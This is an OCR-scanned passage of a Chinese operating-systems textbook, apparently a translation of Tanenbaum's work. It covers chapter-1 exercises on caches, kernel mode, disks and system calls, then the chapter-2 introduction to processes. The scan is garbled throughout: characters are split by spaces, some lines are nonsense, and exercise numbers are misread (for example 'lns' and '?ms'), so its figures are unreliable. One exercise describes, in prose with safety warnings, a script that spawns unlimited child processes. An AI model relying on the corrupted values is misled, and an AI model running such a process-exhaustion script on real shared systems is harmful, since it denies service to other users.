通常 每 行 长 32 或 64 字 节 。 每 次 缓存 一 整个 cache 

行 。 每 次 缓存 一 整 行 而 不 是 一 个 字 节 或 一 个 字 ， 

这 样 做 的 优点 是 什么 ? 

.在 早期 计算 机 中 ， 每 个 字 节 的 读 写 直 接 由 CPU 

处 理 ( 即 没有 DMA)。 对 于 多 道 程序 而 言 这 种 

组 织 方式 有 什么 含义 ? 

.与 访问 IO 设备 相关 的 指令 通常 是 特权 指令 ， 也 

就 是 说 ， 它 们 能 在 内 核 态 执行 而 在 用 户 态 则 不 

行 。 说 明 为 什么 这 些 指令 是 特权 指令 。 

. 系列 计算 机 的 思想 在 20 世 纪 60 年 代 由 IBM 引入 

System/360 大 型 机 。 现 在 这 种 思想 已 经 消亡 了 

还 是 继续 活跃 着 ? 

.缓慢 采用 GUI 的 一 个 原因 是 支持 它 的 硬件 的 成 

本 (高 昂 ) 。 为 了 支持 25 行 80 列 字符 的 单 色 文本 

屏幕 ， 需 要 多 少 视频 RAM? 对 于 1024 x 768 像 

素 24 位 色彩 位 图 需要 多 少 视频 RAM? 在 1980 年 
(每 KB5 美 元 )， 这 些 RAM 的 成 本 是 多 少 ? 现在 

它 的 成 本 是 多 少 ? 

9. 在 建立 一 个 操作 系统 时 有 几 个 设计 目的 ， 例 如 
资源 利用 、 及 时 性 、 健 壮 性 等 。 请 列举 两 个 可 
能 互相 矛盾 的 设计 目的 。 

10. 内 核 态 和 用 户 态 有 哪些 区 别 ? 解释 在 设计 操作 
系统 时 存在 两 种 不 同 的 模式 有 什么 帮助 。 
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a 


N 


oo 


_ 
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.一 个 255GB 大 小 的 磁盘 有 65 536 个 柱 面 ， 每 个 

磁道 有 255 个 扁 区 ， 每 个 扁 区 有 512 字 节 。 这 个 
磁盘 有 多 少 盘 片 和 磁头 ? 假设 平均 寻 道 时 间 为 
11ms ， 平 均 旋 转 延 迟 为 ?ms， 读 取 速 率 为 
100MB/S， 计 算 从 一 个 扇 区 读 取 400KB 需 要 的 
平均 时 间 。 

12. 下 面 的 哪 一 条 指令 只 能 在 内 核 态 使 用 ? 

(a) 禁止 所 有 的 中 断 。 
(b) 读 日 期 -时 间 时 钟 。 
(c) 设置 日 期 -时 间 时 钟 。 
(d) 改变 存储 器 映像 。 

13. 考虑 一 个 有 两 个 CPU 的 系统 ， 并 且 每 一 个 CPU 
有 两 个 线程 ( 超 线程 )。 假 设 有 三 个 程序 P0、 
P1、P2， 分 别 以 运行 时 间 5ms、10ms、20ms 
开始 。 运 行 这 些 程序 需要 多 少时 间 ? 假设 这 三 
个 程序 都 是 100% 限于 CPU， 在 运行 时 无 阻 
塞 ， 并 且 一 旦 设 定 就 不 改变 CPU 。 

14. 一 台 计 算 机 有 一 个 四 级 流水 线 ， 每 一 级 都 花费 
相同 的 时 间 执 行 其 工作 ， 即 lns。 这 人 台 机 器 每 
秒 可 执行 多 少 条 指令 ? 

15. 假 设 一 个 计算 机 系统 有 高 速 缓存 、 内 存 
(RAM) 以 及 磁盘 ， 操 作 系 统 用 虚拟 内 存 。 读 
取 缓 存 中 的 一 个 词 需要 lns，RAM 需要 10ns， 
磁盘 需要 10ms。 如 果 缓 存 的 命中 率 是 95%, 
内 存 的 是 99% (缓存 失效 时 ) ， 读 取 一 个 词 的 
平均 时 间 是 多 少 ? 

16. 在 用 户 程序 进行 一 个 系统 调用 ， 以 读 写 磁 盘 文 

件 时 ， 该 程序 提供 指示 说 明了 所 需要 的 文件 、 
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一 个 指向 数据 缓冲 区 的 指针 以 及 计数 。 然 后 ， 
控制 权 转 给 操作 系统 , 它 调用 相关 的 驱动 程序 。 
假设 驱动 程序 启动 磁盘 并 且 直到 中 断 发 生 才 终 
止 。 在 从 磁盘 读 的 情况 下 ， 很 明显 ， 调 用 者 会 
被 阻塞 (因为 文件 中 没有 数据 )。 在 向 磁盘 写 
时 会 发 生 什么 情况 ? 需要 把 调用 者 阻塞 一 直 等 
到 磁盘 传送 完成 为 止 吗 ? 


. 什么 是 陷阱 指令 ? 在 操作 系统 中 解释 它 的 用 途 。 
- 在 分 时 系统 中 为 什么 需要 进程 表 ? 在 只 有 一 个 进 


程 存在 的 个 人 计算 机 系统 中 ， 该 进程 控制 整个 机 
器 直到 进程 结束 ， 这 种 机 器 也 需要 进程 表 吗 ? 


.说 明 有 没有 理由 在 一 个 非 空 的 目录 中 安装 一 个 


文件 系统 。 如 果 要 这 样 做 ， 如 何 做 ? 


.对 于 下 列 系 统 调用 ， 给 出 引起 失败 的 条 件 : 


fork、exec 以 及 unlink 。 


:下列 资源 能 使 用 哪 种 多 路 复 用 〈 时 间 、 空 间或 


HRS Bay): CPU, Ate, Rett, WR, 47 
印 机 ， 键 盘 以 及 显示 器 ? 
在 


count = write(fd, buffer, nbytes); 


调用 中 ， 是 否 能 将 函数 返回 值 传递 给 count 变 
量 而 不 是 nbytes 变 量 ? 如 果 能 ， 为 什么 ? 

有 一 个 文件 ， 其 文件 描述 符 是 fd， 内 含 下 列 字 
Dy AA Ts 4 15 eh 
有 如 下 系统 调用 : 

lseek(fd, 3, SEEK_SET); 

read(fd, &buffer, 4); 

其 中 lseek 调 用 寻找 文件 中 的 字 节 3。 在 读 操作 
完成 之 后 ，buffer 中 的 内 容 是 什么 ? 

假设 一 个 10MB 的 文件 保存 在 磁盘 同一 磁道 
(磁道 号 为 50) 的 连续 扇 区 中 。 磁 盘 的 磁 臂 此 
时 位 于 第 100 号 磁道 。 要 想 从 磁盘 上 找 回 这 个 
文件 ， 需 要 多 长 时 间 ? 假设 磁 臂 从 一 个 柱 面 移 
动 到 下 一 个 柱 面 需 要 1ms ,保存 文件 的 开始 部 
分 的 扇 区 旋转 到 磁头 下 需要 Sms， 并 且 读 速率 
是 200MB/s。 


. 块 特殊 文件 和 字符 特殊 文件 的 基本 差别 是 什么 ? 
26. 


在 图 1-17 的 例子 中 库 调用 称 为 read， 而 系统 调 
用 自身 称 为 read。 这 两 者 都 有 相同 的 名 字 是 正 
常 的 吗 ? 如 果 不 是 ， 哪 一 个 更 重要 ? 


.现代 操作 系统 将 进程 的 地 址 空间 从 机 器 物理 内 


存 中 分 离 出 来 。 列 举 这 种 设计 的 两 个 好 处 。 


28. 


29. 
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对 程序 员 而 言 ， 系 统 调用 就 像 对 其 他 库 过 程 的 
调用 一 样 。 有 无 必要 让 程序 员 了 解 哪 一 个 库 过 
程 导 致 了 系统 调用 ? 在 什么 情形 下 ， 为 什么 ? 
图 1-23 说 明 有 一 批 UNIX 的 系统 调用 没有 与 之 
等 价 的 Win32 API。 对 于 所 列 出 的 每 一 个 没有 
Win32 等 价 的 调用 ， 若 程序 员 要 把 一 个 UNIX 
程序 转换 到 Windows 下 运行 ， 会 有 什么 后 果 ? 


. 可 移植 的 操作 系统 是 从 一 个 系统 体系 结构 移动 


到 另 一 个 系统 体系 结构 而 不 需要 任何 修改 的 操 
作 系 统 。 请 解释 为 什么 建立 一 个 完全 可 移植 性 
的 操作 系统 是 不 可 行 的 。 描 述 一 下 在 设计 一 个 
高 度 可 移植 的 操作 系统 时 你 设计 的 两 个 高 级 层 
是 什么 样 的 。 


.请 解释 在 建立 基于 微 内 核 的 操作 系统 时 策略 与 


机 制 分 离 带 来 的 好 处 。 

虚拟 机 由 于 很 多 因素 而 十 分 流行 ， 然 而 它们 也 

有 一 些 缺 点 ， 给 出 一 个 缺点 。 

下 面 是 单位 转换 的 练习 : 

(a) 一 微 年 是 多 少 秒 ? 

(b) 微米 常 称 为 micron。 那 么 meigamicron 是 多 长 ? 

(c) 1PB 存 储 器 中 有 多 少 字 节 ? 

(d) 地 球 的 质量 是 6000 yottagram， 换 算 成 
kilogram 是 多 少 ? 

写 一 个 和 图 1-19 类 似 的 shell， 但 是 包含 足够 的 

实际 可 工作 的 代码 ， 这 样 可 测试 它 。 还 可 以 添 

加 某 些 功能 ， 如 输入 输出 重 定 向 、 管 道 以 及 后 

台 作 业 等 。 

如 果 你 有 一 个 个 人 UNIX 类 操作 系统 (Linux, 

MINIX/3、FreeBSD 等 )， 可 以 安全 地 崩溃 和 再 

启动 ， 请 写 一 个 试图 创建 无 限制 数量 子 进程 的 

shell 脚 本 并 观察 所 发 生 的 事 。 在 运行 实验 之 前 ， 

通过 shell 键 入 sync， 在 磁盘 上 备 好 文件 缓冲 区 

以 避免 毁坏 文件 系统 。 注 意 : 在 没有 得 到 系统 

管理 员 的 允许 之 前 ， 不 要 在 分 时 系统 上 进行 这 

一 尝试 。 其 后 果 将 会 立即 出 现 ， 尝 试 者 可 能 会 

被 抓 住 并 受到 惩罚 。 

用 一 个 类 似 于 UNIX od 的 工具 考察 并 尝试 解释 

UNIX 类 系统 或 Windows WAR. Ha: 如 何 

进行 取决 于 OS 允许 做 什么 。 一 个 有 益 的 技巧 是 

在 软盘 上 创建 一 个 目录 ， 其 中 包含 一 个 操作 系 

统 ， 然 后 使 用 另 一 个 允许 进行 此 类 访问 的 不 同 

的 操作 系统 读 取 盘 上 的 原始 数据 。 
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进程 与 线程 





从 本 章 开始 ， 我 们 将 深入 考察 操作 系统 是 如 何 设计 和 构造 的 。 操 作 系统 中 最 核心 的 概念 是 进程 : 这 
是 对 正在 运行 程序 的 一 个 抽象 。 操 作 系 统 的 其 他 所 有 内 容 都 是 围绕 着 进程 的 概念 展开 的 ， 所 以 ， 让 操作 
系统 的 设计 者 (及 学 生 ) 尽快 并 透彻 地 理解 进程 是 非常 重要 的 。 

进程 是 操作 系统 提供 的 最 古老 的 也 是 最 重要 的 抽象 概念 之 一 。 即 使 可 以 使 用 的 CPU 只 有 一 个 ， 
但 它们 也 具有 支持 ( 伪 ) 并 发 操作 的 能 力 ， 它 们 将 一 个 单独 的 CPU 变换 成 多 个 虚拟 的 CPU。 没 有 进 
程 的 抽象 ， 现 代 计 算 将 不 复 存 在 。 本 章 会 通过 大 量 的 细节 去 探究 进程 ， 以 及 它们 的 第 一 个 亲戚 一 一 
线程 。 


2.1 进程 

所 有 现代 的 计算 机 经 常会 在 同一 时 间 做 许多 件 事 。 习 惯 于 在 个 人 计算 机 上 工作 的 人 们 也 许 不 会 十 分 
注意 这 个 事实 ， 因 此 列举 一 些 例子 可 以 更 清楚 地 说 明 这 一 问题 。 先 考虑 一 个 网 络 服 务 器 ， 一 些 网 页 请 求 
从 各 处 进入 。 当 一 个 请 求 进入 时 ， 服 务 器 检查 其 需要 的 网 页 是 否 在 缓存 中 。 如 果 是 ， 则 把 网 页 发 送 回 
Fs 如 果 不 是 ， 则 启动 一 个 磁盘 请 求 以 获取 网 页 。 然 而 ， 从 CPU 的 角度 来 看 ， 磁 盘 请 求 需要 漫长 的 时 间 。 
当 等 待 磁盘 请 求 完成 时 ， 其 他 更 多 的 请 求 将 会 进入 。 如 果 有 多 个 磁盘 存在 ， 可 以 在 满足 第 一 个 请 求 之 前 
就 接二连三 地 对 其 他 的 磁盘 发 出 部 分 或 全 部 请 求 。 很 明显 ， 需 要 一 些 方法 去 模拟 并 控制 这 种 并 发 。 进 程 
(特别 是 线程 ) 在 这 里 就 可 以 发 挥 作 用 。 

现在 考虑 只 有 一 个 用 户 的 PC。 一 般 用 户 不 知道 ， 当 启动 系统 时 ， 会 秘密 启动 许多 进程 。 例 如 ， 启 
动 一 个 进程 用 来 等 待 进 入 的 电子 邮件 ， 或 者 启动 另 一 个 防 病毒 进程 周期 性 地 检查 是 否 有 病毒 库 更 新 。 另 
外 ， 某 个 用 户 进程 可 能 会 在 所 有 用 户 上 网 的 时 候 打 印 文件 以 及 刻录 CD-ROM。 这 些 活动 都 需要 管理 ， 于 
是 一 个 支持 多 进程 的 多 道 程序 系统 在 这 里 就 显得 很 有 用 了 。 

在 任何 多 道 程序 设计 系统 中 ，CPU 由 一 个 进程 快速 切换 至 另 一 个 进程 ， 使 每 个 进程 各 运行 几 十 或 几 
百 毫 秒 。 严 格 地 说 ， 在 某 一 个 瞬间 ，CPU 只 能 运行 一 个 进程 。 但 在 1 秒 钟 内 ， 它 可 能 运行 多 个 进程 ， 这 
样 就 产生 并 行 的 错觉 。 有 时 人 们 所 说 的 伪 并 行 就 是 指 这 种 情形 ， 以 此 来 区 分 多 处 理 器 系统 (该 系统 有 两 
个 或 多 个 CPU 共享 同一 个 物理 内 存 ) 的 真正 硬件 并 行 。 人 们 很 难 对 多 个 并 行 活动 进行 跟踪 ， 因 此 ， 经 过 
多 年 的 努力 ， 操 作 系 统 的 设计 者 开发 了 用 于 描述 并 行 的 一 种 概念 模型 (顺序 进程 )， 使 得 并 行 更 容易 处 
理 。 有 关 该 模型 、 它 的 使 用 以 及 它 的 影响 正 是 本 章 的 主题 。 


2.1.1 进程 模型 

在 进程 模型 中 ， 计 算 机 上 所 有 可 运行 的 软件 ， 通 常 也 包括 操作 系统 ， 被 组 织 成 若干 顺序 进程 
(sequential process), ， 简 称 进 程 (process) 。 一 个 进程 就 是 一 个 正在 执行 程序 的 实例 ， 包 括 程序 计数 器 、 
寄存 器 和 变量 的 当前 值 。 从 概念 上 说 ， 每 个 进程 拥有 它 自 己 的 虚拟 CPU。 当 然 ， 实 际 上 真正 的 CPU 在 各 
进程 之 间 来 回 切换 。 但 为 了 理解 这 种 系统 ， 考 虑 在 (W) 并 行情 况 下 运行 的 进程 集 ， 要 比试 图 跟踪 CPU 
如 何在 程序 间 来 回 切换 简单 得 多 。 正 如 在 第 1 章 所 看 到 的 ， 这 种 快速 的 切换 称 作 多 道 程序 设计 。 

在 图 2-1a 中 可 以 看 到 ， 在 一 台 多 道 程序 计算 机 的 内 存 中 有 4 道 程序 。 在 图 2-lb 中 ， 这 4 道 程序 被 抽象 
为 4 个 各 自 拥有 自己 控制 流程 ( 即 每 个 程序 自己 的 逻辑 程序 计数 器 ) 的 进程 ， 并 且 每 个 程序 都 独立 地 运 
行 。 当 然 ， 实 际 上 只 有 一 个 物理 程序 计数 器 ， 所 以 在 每 个 程序 运行 时 ， 它 的 逻辑 程序 计数 器 被 装 入 实际 
的 程序 计数 器 中 。 当 该 程序 执行 结束 (或 暂停 执行 ) 时 ， 物 理 程序 计数 器 被 保存 在 内 存 中 该 进程 的 逻辑 
程序 计数 器 中 。 在 图 2-1c 中 可 以 看 到 ， 在 观察 足够 长 的 一 段 时 间 后 ， 所 有 的 进程 都 运行 了 ， 但 在 任何 一 
个 给 定 的 瞬间 仅 有 一 个 进程 真正 在 运行 。 
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一 个 程序 计数 器 





四 个 程序 计数 器 


图 2-1 a) 含有 4 道 程序 的 多 道 程序 ，b) 4 个 独立 的 顺序 进程 的 概念 模型 ， 
c) 在 任意 时 刻 仅 有 一 个 程序 是 活跃 的 


在 本 章 ， 我 们 假设 只 有 一 个 CPU。 当 然 ， 逐 渐 这 个 假设 就 不 为 真 了 ， 因 为 新 的 芯片 经 常 是 多 核 的 ， 
包含 2 个 、4 个 或 更 多 的 CPU。 第 8 章 将 会 介绍 多 核 芯片 以 及 多 处 理 器 ， 但 是 现在 ， 一 次 只 考虑 一 个 CPU 
会 更 简单 一 些 。 因 此 ， 当 我 们 说 一 个 CPU 只 能 真正 一 次 运行 一 个 进程 的 上 时候， 即使 有 2 个 核 (或 CPU )， 
每 一 个 核 也 只 能 一 次 运行 一 个 进程 。 

由 于 CPU 在 各 进程 之 间 来 回 快速 切换 ， 所 以 每 个 进程 执行 其 运算 的 速度 是 不 确定 的 。 而 且 当 同一 进 
程 再 次 运行 时 ， 其 运算 速度 通常 也 不 可 再 现 。 所 以 ， 在 对 进程 编程 时 决 不 能 对 时 序 做 任何 想当然 的 假设 。 
例如 ， 考 虑 一 个 IO 进程 ， 它 用 流 式 磁带 机 恢复 备份 的 文件 ， 它 执行 一 个 10 000 次 的 空 循环 以 等 待 磁带 机 
达到 正常 速度 ， 然 后 发 出 命令 读 取 第 一 个 记录 。 如 果 CPU 决 定 在 空 循环 期 间 切 换 到 其 他 进程 ， 则 磁带 机 
进程 可 能 在 第 一 条 记录 通过 磁头 之 后 还 未 被 再 次 运行 。 当 一 个 进程 具有 此 类 严格 的 实时 要 求 时 ， 也 就 是 
一 些 特定 事件 一 定 要 在 所 指定 的 若干 毫秒 内 发 生 ， 那 么 必须 采取 特殊 措施 以 保证 它们 一 定 在 这 段 时间 中 
发 生 。 然 而 ， 通 常 大 多 数 进程 并 不 受 CPU 多 道 程序 设计 或 其 他 进程 相对 速度 的 影响 。 

进程 和 程序 间 的 区 别 是 很 微妙 的 ， 但 非常 重要 。 用 一 个 比喻 可 以 更 容易 理解 这 一 点 。 想 象 一 位 有 一 
手 好 厨 艺 的 计算 机 科学 家 正在 为 他 的 女儿 烘 制 生日 蛋糕 。 他 有 做 生日 蛋糕 的 食谱 ， 厨 房 旦 有 所 需 的 原料 : 
面粉 、 鸡 蛋 、 糖 、 香 草 汁 等 。 在 这 个 比喻 中 ， 做 蛋糕 的 食谱 就 是 程序 ( 即 用 适当 形式 描述 的 算法 ) it 
算 机 科学 家 就 是 处 理 器 (CPU)， 而 做 蛋糕 的 各 种 原料 就 是 输入 数据 。 进 程 就 是 厨师 阅读 食谱 、 取 来 各 
种 原料 以 及 烘 制 蛋糕 等 一 系列 动作 的 总 和 。 

现在 假设 计算 机 科学 家 的 儿子 哭 着 跑 了 进来 ， 说 他 的 头 被 一 只 蜜蜂 规 了 。 计 算 机 科学 家 就 记录 下 他 照 着 
食谱 做 到 哪儿 了 (保存 进程 的 当前 状态 ) ， 然 后 拿 出 一 本 急救 手册 ， 按 照 其 中 的 指示 处 理 盐 伤 。 这 里 ， 处 理 
机 从 一 个 进程 (做 蛋糕 ) 切换 到 另 一 个 高 优先 级 的 进程 (实施 医疗 救治 )， 每 个 进程 拥有 各 自 的 程序 (食谱 
和 急救 手册 )。 当 蜜蜂 扑 伤 处 理 完 之 后 ， 这 位 计算 机 科学 家 又 回来 做 蛋 焙 ， 从 他 离开 时 的 那 一 步 继续 做 下 去 。 

这 里 的 关键 思想 是 : 一 个 进程 是 某 种 类 型 的 一 个 活动 ， 它 有 程序 、 输 入 、 输 出 以 及 状态 。 单 个 处 理 器 
可 以 被 若干 进程 共享 ， 它 使 用 某 种 调度 算法 决定 何 时 停止 一 个 进程 的 工作 ， 并 转 而 为 另 一 个 进程 提供 服务 。 

值得 注意 的 是 ， 如 果 一 个 程序 运行 了 两 遍 ， 则 算 作 两 个 进程 。 例 如 ， 人 们 可 能 经 常 两 次 启动 同一 个 
字 处 理 软 件 , 或 在 有 两 个 可 用 的 打印 机 的 情况 下 同时 打印 两 个 文件 。 像 “两 个 进程 恰好 运行 同一 个 程序 ” 
这 样 的 事实 其 实 无 关 紧 要 ， 因 为 它们 是 不 同 的 进程 。 操 作 系统 能 够 使 它们 共享 代码 ， 因 此 只 有 一 个 副本 
放 在 内 存 中 ， 但 那 只 是 一 个 技术 性 的 细节 ， 不 会 改变 有 两 个 进程 正在 运行 的 概念 。 


2.1.2 进程 的 创建 

操作 系统 需要 有 一 种 方式 来 创建 进程 。 一 些 非 常 简单 的 系统 ， 即 那 种 只 为 运行 一 个 应 用 程序 设计 的 
系统 (例如 ， 微 波 炉 中 的 控制 器 ) ， 可 能 在 系统 启动 之 时 ， 以 后 所 需要 的 所 有 进程 都 已 在 在。 然而， 在 
通用 系统 中 ， 需 要 有 某 种 方法 在 运行 时 按 需要 创建 或 撤销 进程 ， 现 在 开始 考察 这 个 问题 。 

4 种 主要 事件 会 导致 进程 的 创建 : 

1) 系统 初始 化 。 

2) 正在 运行 的 程序 执行 了 创建 进程 的 系统 调用 。 

3) 用 户 请 求 创建 一 个 新 进程 。 

4) 一 个 批 处 理 作 业 的 初始 化 。 


< ee 


启动 操作 系统 时 ， 通 常会 创建 若干 个 进程 。 其 中 有 些 是 前 台 进 程 ， 也 就 是 同 用 户 (人 类 ) 交互 并 且 
替 他 们 完成 工作 的 那些 进程 。 其 他 的 是 后 台 进 程 ， 这 些 进 程 与 特定 的 用 户 没 有 关系 ， 相 反 ， 却 具有 某 些 
专门 的 功能 。 例 如 ， 设 计 一 个 后 台 进 程 来 接收 发 来 的 电子 邮件 ， 这 个 进程 在 一 天 的 大 部 分 时 间 都 在 睡眠 ， 
但 是 当 电 子 邮件 到 达 时 就 突然 被 唤醒 了 。 也 可 以 设计 另 一 个 后 台 进 程 来 接收 对 该 机 器 中 Web 页 面 的 访问 
请 求 ， 在 请 求 到 达 时 唤醒 该 进程 以 便服 务 该 请 求 。 停 留 在 后 台 处 理 诸 如 电子 邮件 、Web 页 面 、 新 闻 、 打 
印 之 类 活动 的 进程 称 为 守护 进程 (daemon)。 在 大 型 系统 中 通常 有 很 多 守护 进程 。 在 UNIXS 中 ， 可 以 用 
ps 程序 列 出 正在 运行 的 进程 ， 在 Windows 中 ， 可 使 用 任务 管理 器 。 

除了 在 启动 阶段 创建 进程 之 外 , 新 的 进程 也 可 以 以 后 创建 。 一 个 正在 运行 的 进程 经 常 发 出 系统 调用 ， 
以 便 创建 一 个 或 多 个 新 进程 协助 其 工作 。 在 所 要 从 事 的 工作 可 以 容易 地 划分 成 若干 相关 的 但 没有 相互 作 
用 的 进程 时 ， 创 建新 的 进程 就 特别 有 效果 。 例 如 ， 如 果 有 大 量 的 数据 要 通过 网 络 调 取 并 进行 顺序 处 理 ， 
那么 创建 一 个 进程 取 数 据 ， 并 把 数据 放 入 共享 缓冲 区 中 ， 而 让 第 二 个 进程 取 走 数据 项 并 处 理 之 ， 应 该 比 
较 容易 。 在 多 处 理 机 中 ， 让 每 个 进程 在 不 同 的 CPU 上 运行 会 使 整个 作业 运行 得 更 快 。 

在 交互 式 系 统 中 ， 键 和 一 个 命令 或 者 点 OM) 击 一 个 图 标 就 可 以 启动 一 个 程序 。 这 两 个 动作 中 的 任何 一 
个 都 会 开始 一 个 新 的 进程 ， 并 在 其 中 运行 所 选择 的 程序 。 在 基于 命令 行 的 UNIX 系 统 中 运行 程序 X， 新 的 进程 
会 从 该 进程 接管 开启 它 的 窗口 。 在 Microsoft Windows 中 ， 多 数 情形 都 是 这 样 的 ， 在 一 个 进程 开始 时 ， 它 并 没 
有 窗口 ， 但 是 它 可 以 创建 一 个 (或 多 个 ) 窗口 。 在 UNIX 和 Windows 系 统 中 ， 用 户 可 以 同时 打开 多 个 窗口 ， 每 
个 窗口 都 运行 一 个 进程 。 通 过 鼠标 用 户 可 以 选择 一 个 窗口 并 且 与 该 进程 交互 ， 例 如 ， 在 需要 时 提供 输入 。 

最 后 一 种 创建 进程 的 情形 仅 在 大 型 机 的 批 处 理 系统 中 应 用 。 用 户 在 这 种 系统 中 (可 能 是 远程 地 ) 提 
交 批 处 理 作 业 。 在 操作 系统 认为 有 资源 可 运行 另 一 个 作业 时 ， 它 创建 一 个 新 的 进程 ， 并 运行 其 输入 队列 
中 的 下 一 个 作业 。 

从 技术 上 看 ， 在 所 有 这 些 情形 中 ， 新 进程 都 是 由 于 一 个 已 存在 的 进程 执行 了 一 个 用 于 创建 进程 的 系 
统 调用 而 创建 的 。 这 个 进程 可 以 是 一 个 运行 的 用 户 进程 、 一 个 由 键盘 或 鼠标 启动 的 系统 进程 或 者 一 个 批 
处 理 管 理 进程 。 这 个 进程 所 做 的 工作 是 ， 执 行 一 个 用 来 创建 新 进程 的 系统 调用 ;这 个 系统 调用 通知 操作 
系统 创建 一 个 新 进程 ， 并 且 直 接 或 间接 地 指定 在 该 进程 中 运行 的 程序 。 

在 UNIX 系 统 中 ， 只 有 一 个 系统 调用 可 以 用 来 创建 新 进程 : fork。 这 个 系统 调用 会 创建 一 个 与 调用 进 
程 相同 的 副本 。 在 调用 了 fork 后 ， 这 两 个 进程 ( 父 进 程 和 子 进程 ) 拥有 相同 的 内 存 映像 、 同 样 的 环境 字 
符 串 和 同样 的 打开 文件 。 这 就 是 全 部 情形 。 通 常 ， 子 进程 接着 执行 execve 或 一 个 类 似 的 系统 调用 ， 以 修 
改 其 内 存 映 像 并 运行 一 个 新 的 程序 。 例 如 ， 当 一 个 用 户 在 shell 中 键入 命令 sort 时 ，shell 就 创建 一 个 子 进程 ， 
然后 ， 这 个 子 进程 执行 sort。 之 所 以 要 安排 两 步 建立 进程 ， 是 为 了 在 fork 之 后 但 在 execve 之 前 允许 该 子 
进程 处 理 其 文件 描述 符 ， 这 样 可 以 完成 对 标准 输入 文件 、 标 准 输出 文件 和 标准 错误 文件 的 重 定向 。 

在 Windows 中 ， 情 形 正 相 反 ， 一 个 Win32 函 数 调用 CreateProcess 既 处 理 进程 的 创建 ， 也 负责 把 正 
确 的 程序 装 入 新 的 进程 。 该 调用 有 10 个 参数 ， 其 中 包括 要 执行 的 程序 、 输 入 给 该 程序 的 命令 行 参数 、 各 
种 安全 属性 、 有 关 打 开 的 文件 是 否 继承 的 控制 位 、 优 先 级 信息 、 该 进程 (车 有 的 话 ) 所 需要 创建 的 窗口 
规格 以 及 指向 一 个 结构 的 指针 ， 在 该 结构 中 新 创建 进程 的 信息 被 返回 给 调用 者 。 除 了 CreateProcess， 
Win32 中 有 大 约 100 个 其 他 的 函数 用 于 处 理 进程 的 管理 、 同 步 以 及 相关 的 事务 。 

在 UNIX 和 Windows 中 ， 进 程 创 建 之 后 ， 父 进程 和 子 进程 有 各 自 不 同 的 地 址 空间 。 如 果 其 中 某 个 进 
程 在 其 地 址 空间 中 修改 了 一 个 字 ， 这 个 修改 对 其 他 进程 而 言 是 不 可 见 的 。 在 UNIX 中 ， 子 进程 的 初始 地 
址 空间 是 父 进程 的 一 个 副本 ， 但 是 这 里 涉及 两 个 不 同 的 地 址 空间 ， 不 可 写 的 内 存 区 是 共享 的 。 某 些 
UNIX 的 实现 使 程序 正文 在 两 者 间 共 享 ， 因 为 它 不 能 被 修改 。 或 者 ， 子 进程 共享 父 进程 的 所 有 内 存 ， 但 
这 种 情况 下 内 存 通过 写 时 复制 (copy-on-write) 共享 ， 这 意味 着 一 旦 两 者 之 一 想 要 修改 部 分 内 存 ， 则 这 
块 内 存 首先 被 明确 地 复制 ， 以 确保 修改 发 生 在 私有 内 存 区域 。 再 次 强调 ， 可 写 的 内 存 是 不 可 以 共享 的 。 
但 是 ， 对 于 一 个 新 创建 的 进程 而 言 ， 确 实 有 可 能 共享 其 创建 者 的 其 他 资源 ， 诸 如 打开 的 文件 等 。 在 
Windows 中 ， 从 一 开始 父 进程 的 地 址 空间 和 子 进 程 的 地 址 空间 就 是 不 同 的 。 


O 在 本 章 中 ， 应 将 UNIX 理 解 为 几乎 所 有 基于 POSIX 的 系统 ， 包 括 Linux、FreeBSD、OS X 和 Solaris 等 ， 如 果 进 一 
步 扩展 这 一 范围 ， 则 还 应 包括 Android 和 iOS。 
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2.1.3 进程 的 终止 

进程 在 创建 之 后 ， 它 开始 运行 ， 完 成 其 工作 。 但 永恒 是 不 存在 的 ， 进 程 也 一 样 。 迟 早 这 个 新 的 进程 
会 终止 ,通常 由 下 列 条 件 引 起 : 

1) 正常 退出 (自愿 的 )。 

2) 出 错 退 出 (自愿 的 )。 

3) 严重 错误 ( 非 自愿 )。 

4) 被 其 他 进程 杀 死 ( 非 自愿 ) 。 

多 数 进 程 是 由 于 完成 了 它们 的 工作 而 终止 。 当 编译 器 完成 了 所 给 定 程序 的 编译 之 后 ， 编 译 器 执行 一 
个 系统 调用 ， 通 知 操作 系统 它 的 工作 已 经 完成 。 在 UNIX 中 该 调用 是 exit， 而 在 Windows 中 ， 相 关 的 调用 
是 ExitProcess。 面 向 屏幕 的 程序 也 支持 自愿 终止 。 字 处 理 软件 、Internet 浏 览 器 和 类 似 的 程序 中 总 有 一 
个 供用 户 点 击 的 图 标 或 菜单 项 ， 用 来 通知 进程 删除 它 所 打开 的 任何 临时 文件 ， 然 后 终止 。 

进程 终止 的 第 二 个 原因 是 进程 发 现 了 严重 错误 。 例 如 ， 如 果 用 户 键入 命令 


cc foo.c 


要 编译 程序 foo.c， 但 是 该 文件 并 不 存在 ， 于 是 编译 器 就 会 退出 。 在 给 出 了 错误 参数 时 ， 面 向 屏幕 的 交互 
式 进程 通常 并 不 退出 。 相 反 ， 这 些 程 序 会 弹出 一 个 对 话 框 ， 并 要 求 用 户 再 试 一 次 。 

进程 终止 的 第 三 个 原因 是 由 进程 引起 的 错误 ， 通常 是 由 于 程序 中 的 错误 所 致 。 例 如 ， 执 行 了 一 条 非 
法 指令 、 引 用 不 存在 的 内 存 ， 或 除数 是 零 等 。 有 些 系统 中 (如 UNIX) ， 进 程 可 以 通知 操作 系统 ， 它 希望 
自行 处 理 某 些 类 型 的 错误 ， 在 这 类 错误 中 ， 进 程 会 收 到 信号 (被 中 断 ) ， 而 不 是 在 这 类 错误 出 现时 终止 。 

第 四 种 终止 进程 的 原因 是 ， 某 个 进程 执行 一 个 系统 调用 通知 操作 系统 杀 死 某 个 其 他 进程 。 在 UNIX 
中 ， 这 个 系统 调用 是 kil。 在 Win32 中 对 应 的 函数 是 TerminateProcess。 在 这 两 种 情形 中 ,“ 杀 手 ” 都 必 
须 获 得 确定 的 授权 以 便 进行 动作 。 在 有 些 系统 中 ， 当 一 个 进程 终止 时 ， 不 论 是 自愿 的 还 是 其 他 原因 ， 由 
该 进程 所 创建 的 所 有 进程 也 一 律 立 即 被 杀 死 。 不 过 ，UNIX 和 Windows 都 不 是 这 种 工作 方式 。 


2.1.4 进程 的 层次 结构 

某 些 系统 中 ， 当 进程 创建 了 另 一 个 进程 后 ， 父 进程 和 子 进程 就 以 某 种 形式 继续 保持 关联 。 子 进程 自 
身 可 以 创建 更 多 的 进程 ， 组 成 一 个 进程 的 层次 结构 。 请 注意 ， 这 与 植物 和 动物 的 有 性 繁殖 不 同 ， 进 程 只 
有 一 个 父 进程 (但 是 可 以 有 零 个 、 一 个 、 两 个 或 多 个 子 进程 ) 。 

